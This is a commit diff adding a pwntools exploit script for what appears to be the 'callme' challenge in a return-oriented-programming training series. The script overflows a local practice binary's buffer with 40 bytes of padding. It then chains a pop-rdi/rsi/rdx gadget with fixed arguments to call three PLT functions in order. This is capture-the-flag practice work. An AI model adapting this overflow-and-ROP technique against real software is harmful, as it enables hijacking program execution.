new file: exploit.py

2020-12-14 23:08:51 -06:00 · 2020-12-14 23:08:51 -06:00 · 2ddedfeb91
commit 2ddedfeb91
parent ae586f332c
1 changed files with 50 additions and 0 deletions
--- a/x86_64/callme/exploit.py
+++ b/x86_64/callme/exploit.py
@ -0,0 +1,50 @@
+#!/usr/bin/env python3
+from pwn import *
+
+usefulGadgets = p64(0x000000000040093c)
+#   pop rdi
+#   pop rsi
+#   pop rdx
+#   ret
+
+arg1 = p64(0xdeadbeefdeadbeef)
+arg2 = p64(0xcafebabecafebabe)
+arg3 = p64(0xd00df00dd00df00d)
+
+callme_1_plt = p64(0x0000000000400720)
+callme_2_plt = p64(0x0000000000400740)
+callme_3_plt = p64(0x00000000004006f0)
+
+
+
+
+prog = process('./callme')
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_1_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_2_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_3_plt
+
+
+
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))